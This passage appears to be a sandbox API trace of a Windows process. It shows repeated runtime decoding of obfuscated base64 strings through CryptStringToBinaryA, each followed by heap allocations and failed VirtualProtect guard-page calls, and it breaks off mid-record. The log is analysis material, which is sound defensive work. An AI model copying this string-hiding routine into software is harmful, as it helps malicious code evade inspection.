Flags=0x8, Size=0x9) returned 0x5bc2a8 [0181.023] CryptStringToBinaryA (in: pszString="QjCFSv6VAjtMAQ==", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.023] CryptStringToBinaryA (in: pszString="QjCFSv6VAjtMAQ==", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.023] GetProcessHeap () returned 0x5b0000 [0181.023] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bb850 [0181.023] VirtualProtect (in: lpAddress=0x5bb850, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.023] GetProcessHeap () returned 0x5b0000 [0181.023] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xb) returned 0x5bc458 [0181.023] CryptStringToBinaryA (in: pszString="dRCIUe+IFSs=", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.023] CryptStringToBinaryA (in: pszString="dRCIUe+IFSs=", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.023] GetProcessHeap () returned 0x5b0000 [0181.023] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bc110 [0181.023] VirtualProtect (in: lpAddress=0x5bc110, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.023] GetProcessHeap () returned 0x5b0000 [0181.023] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x9) returned 0x5bc398 [0181.023] CryptStringToBinaryA (in: pszString="WxmUQe+VEiM=", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.023] CryptStringToBinaryA (in: pszString="WxmUQe+VEiM=", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.023] GetProcessHeap () returned 0x5b0000 [0181.023] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bb968 [0181.023] VirtualProtect (in: lpAddress=0x5bb968, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.024] GetProcessHeap () returned 0x5b0000 [0181.024] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x9) returned 0x5bc428 [0181.024] CryptStringToBinaryA (in: pszString="QjCdR/iTFTtMATH3ccXJLigF", cchString=0x18, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.024] CryptStringToBinaryA (in: pszString="QjCdR/iTFTtMATH3ccXJLigF", cchString=0x18, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.024] GetProcessHeap () returned 0x5b0000 [0181.024] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5ba270 [0181.024] VirtualProtect (in: lpAddress=0x5ba270, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.024] GetProcessHeap () returned 0x5b0000 [0181.024] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x13) returned 0x5bc530 [0181.024] CryptStringToBinaryA (in: pszString="NFvb", cchString=0x4, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.024] CryptStringToBinaryA (in: pszString="NFvb", cchString=0x4, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.024] GetProcessHeap () returned 0x5b0000 [0181.024] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bac48 [0181.024] VirtualProtect (in: lpAddress=0x5bac48, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.024] GetProcessHeap () returned 0x5b0000 [0181.024] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x4) returned 0x5bc8d0 [0181.024] CryptStringToBinaryA (in: pszString="WxmUQe+VEiNtCQU=", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.024] CryptStringToBinaryA (in: pszString="WxmUQe+VEiNtCQU=", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.024] GetProcessHeap () returned 0x5b0000 [0181.024] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5ba388 [0181.024] VirtualProtect (in: lpAddress=0x5ba388, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.025] GetProcessHeap () returned 0x5b0000 [0181.025] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xc) returned 0x5bc440 [0181.025] CryptStringToBinaryA (in: pszString="QjCdR/iTFTtMcArCXvXbOzc1L8/e6A==", cchString=0x20, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.025] CryptStringToBinaryA (in: pszString="QjCdR/iTFTtMcArCXvXbOzc1L8/e6A==", cchString=0x20, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.025] GetProcessHeap () returned 0x5b0000 [0181.025] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5ba5b8 [0181.025] VirtualProtect (in: lpAddress=0x5ba5b8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.025] GetProcessHeap () returned 0x5b0000 [0181.025] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x17) returned 0x5bc690 [0181.025] CryptStringToBinaryA (in: pszString="Ww2eRu6U", cchString=0x8, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.025] CryptStringToBinaryA (in: pszString="Ww2eRu6U", cchString=0x8, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.025] GetProcessHeap () returned 0x5b0000 [0181.025] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bd740 [0181.026] VirtualProtect (in: lpAddress=0x5bd740, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.026] GetProcessHeap () returned 0x5b0000 [0181.026] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x7) returned 0x5be8e8 [0181.026] CryptStringToBinaryA (in: pszString="QjCJTf+SFBI=", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.026] CryptStringToBinaryA (in: pszString="QjCJTf+SFBI=", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.026] GetProcessHeap () returned 0x5b0000 [0181.026] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5be7a8 [0181.026] VirtualProtect (in: lpAddress=0x5be7a8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.026] GetProcessHeap () returned 0x5b0000 [0181.026] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x9) returned 0x5bc470 [0181.026] CryptStringToBinaryA (in: pszString="ew2eRu6USS1OMyC4d9rDNA==", cchString=0x18, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.026] CryptStringToBinaryA (in: pszString="ew2eRu6USS1OMyC4d9rDNA==", cchString=0x18, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.026] GetProcessHeap () returned 0x5b0000 [0181.026] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bc908 [0181.026] VirtualProtect (in: lpAddress=0x5bc908, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.026] GetProcessHeap () returned 0x5b0000 [0181.026] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x11) returned 0x5bc750 [0181.026] CryptStringToBinaryA (in: pszString="aRyfRvSQSj1VPDLzM8PfNTU=", cchString=0x18, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.128] CryptStringToBinaryA (in: pszString="aRyfRvSQSj1VPDLzM8PfNTU=", cchString=0x18, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.128] GetProcessHeap () returned 0x5b0000 [0181.128] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bd628 [0181.128] VirtualProtect (in: lpAddress=0x5bd628, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.129] GetProcessHeap () returned 0x5b0000 [0181.129] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x12) returned 0x5bc5d0 [0181.129] CryptStringToBinaryA (in: pszString="QjCJTf+SFBJEJSnyaNqCLTo1Jt7Z6A==", cchString=0x20, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.129] CryptStringToBinaryA (in: pszString="QjCJTf+SFBJEJSnyaNqCLTo1Jt7Z6A==", cchString=0x20, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.129] GetProcessHeap () returned 0x5b0000 [0181.129] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bd2e0 [0181.129] VirtualProtect (in: lpAddress=0x5bd2e0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.129] GetProcessHeap () returned 0x5b0000 [0181.129] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x17) returned 0x5bc6b0 [0181.129] CryptStringToBinaryA (in: pszString="bhSCUeuPFS9SOGj8bsbC", cchString=0x14, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.129] CryptStringToBinaryA (in: pszString="bhSCUeuPFS9SOGj8bsbC", cchString=0x14, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.129] GetProcessHeap () returned 0x5b0000 [0181.129] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bcc50 [0181.129] VirtualProtect (in: lpAddress=0x5bcc50, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.129] GetProcessHeap () returned 0x5b0000 [0181.129] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x10) returned 0x5bc2f0 [0181.129] CryptStringToBinaryA (in: pszString="bRCURrWUAi1O", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.129] CryptStringToBinaryA (in: pszString="bRCURrWUAi1O", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.129] GetProcessHeap () returned 0x5b0000 [0181.129] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5be690 [0181.129] VirtualProtect (in: lpAddress=0x5be690, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.130] GetProcessHeap () returned 0x5b0000 [0181.130] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xa) returned 0x5be940 [0181.130] CryptStringToBinaryA (in: pszString="dxuXTbWUAi1O", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.130] CryptStringToBinaryA (in: pszString="dxuXTbWUAi1O", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.130] GetProcessHeap () returned 0x5b0000 [0181.130] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5be000 [0181.130] VirtualProtect (in: lpAddress=0x5be000, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.130] GetProcessHeap () returned 0x5b0000 [0181.130] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xa) returned 0x5be928 [0181.130] CryptStringToBinaryA (in: pszString="WxmUQe+VCCBiPDX+", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.130] CryptStringToBinaryA (in: pszString="WxmUQe+VCCBiPDX+", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.130] GetProcessHeap () returned 0x5b0000 [0181.130] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bca20 [0181.130] VirtualProtect (in: lpAddress=0x5bca20, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.130] GetProcessHeap () returned 0x5b0000 [0181.130] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xd) returned 0x5be958 [0181.130] CryptStringToBinaryA (in: pszString="QjCdR/iTFSFPHifldfXbOzc1L8/e6A==", cchString=0x20, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.130] CryptStringToBinaryA (in: pszString="QjCdR/iTFSFPHifldfXbOzc1L8/e6A==", cchString=0x20, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.130] GetProcessHeap () returned 0x5b0000 [0181.130] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bddd0 [0181.130] VirtualProtect (in: lpAddress=0x5bddd0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.130] GetProcessHeap () returned 0x5b0000 [0181.131] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x17) returned 0x5bc610 [0181.131] CryptStringToBinaryA (in: pszString="ehCXQ+6LExFWPCr6eN0=", cchString=0x14, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.131] CryptStringToBinaryA (in: pszString="ehCXQ+6LExFWPCr6eN0=", cchString=0x14, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.131] GetProcessHeap () returned 0x5b0000 [0181.131] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bdba0 [0181.131] VirtualProtect (in: lpAddress=0x5bdba0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.131] GetProcessHeap () returned 0x5b0000 [0181.131] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xf) returned 0x5bea60 [0181.131] CryptStringToBinaryA (in: pszString="U3WdVvKjCClE", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.131] CryptStringToBinaryA (in: pszString="U3WdVvKjCClE", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.131] GetProcessHeap () returned 0x5b0000 [0181.131] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bcd68 [0181.131] VirtualProtect (in: lpAddress=0x5bcd68, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.131] GetProcessHeap () returned 0x5b0000 [0181.131] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xa) returned 0x5beb98 [0181.131] CryptStringToBinaryA (in: pszString="QjiETu+OIyFGOBo=", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.131] CryptStringToBinaryA (in: pszString="QjiETu+OIyFGOBo=", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.131] GetProcessHeap () returned 0x5b0000 [0181.131] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bcb38 [0181.131] VirtualProtect (in: lpAddress=0x5bcb38, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.131] GetProcessHeap () returned 0x5b0000 [0181.131] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xc) returned 0x5bea78 [0181.132] CryptStringToBinaryA (in: pszString="c3WdVvKDCClEczH3ccXJLg==", cchString=0x18, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.132] CryptStringToBinaryA (in: pszString="c3WdVvKDCClEczH3ccXJLg==", cchString=0x18, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.132] GetProcessHeap () returned 0x5b0000 [0181.132] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bce80 [0181.132] VirtualProtect (in: lpAddress=0x5bce80, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.132] GetProcessHeap () returned 0x5b0000 [0181.132] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x11) returned 0x5bc790 [0181.132] CryptStringToBinaryA (in: pszString="VDSpeg==", cchString=0x8, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.132] CryptStringToBinaryA (in: pszString="VDSpeg==", cchString=0x8, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.132] GetProcessHeap () returned 0x5b0000 [0181.132] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5be578 [0181.132] VirtualProtect (in: lpAddress=0x5be578, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.132] GetProcessHeap () returned 0x5b0000 [0181.132] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x5) returned 0x5bed00 [0181.132] CryptStringToBinaryA (in: pszString="Qh+QWuO7KyFCPCq2Tt3DKDo+L+c=", cchString=0x1c, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.132] CryptStringToBinaryA (in: pszString="Qh+QWuO7KyFCPCq2Tt3DKDo+L+c=", cchString=0x1c, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.132] GetProcessHeap () returned 0x5b0000 [0181.132] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bd970 [0181.132] VirtualProtect (in: lpAddress=0x5bd970, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.132] GetProcessHeap () returned 0x5b0000 [0181.132] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x15) returned 0x5bc570 [0181.132] CryptStringToBinaryA (in: pszString="eBydR8S4V2BNMiX3cdrYNSk4Ld4=", cchString=0x1c, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.132] CryptStringToBinaryA (in: pszString="eBydR8S4V2BNMiX3cdrYNSk4Ld4=", cchString=0x1c, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.133] GetProcessHeap () returned 0x5b0000 [0181.133] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5be230 [0181.133] VirtualProtect (in: lpAddress=0x5be230, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.133] GetProcessHeap () returned 0x5b0000 [0181.133] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x15) returned 0x5bc5b0 [0181.133] CryptStringToBinaryA (in: pszString="XwGeT/KE", cchString=0x8, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.133] CryptStringToBinaryA (in: pszString="XwGeT/KE", cchString=0x8, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.133] GetProcessHeap () returned 0x5b0000 [0181.133] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5bcf98 [0181.133] VirtualProtect (in: lpAddress=0x5bcf98, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.133] GetProcessHeap () returned 0x5b0000 [0181.133] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x7) returned 0x5bed10 [0181.133] CryptStringToBinaryA (in: pszString="QhSFTfaOBBJtMiX3cYn/LjQrK9zI6AXRZeF5T7+C", cchString=0x28, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.133] CryptStringToBinaryA (in: pszString="QhSFTfaOBBJtMiX3cYn/LjQrK9zI6AXRZeF5T7+C", cchString=0x28, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.133] GetProcessHeap () returned 0x5b0000 [0181.133] RtlAllocateHeap 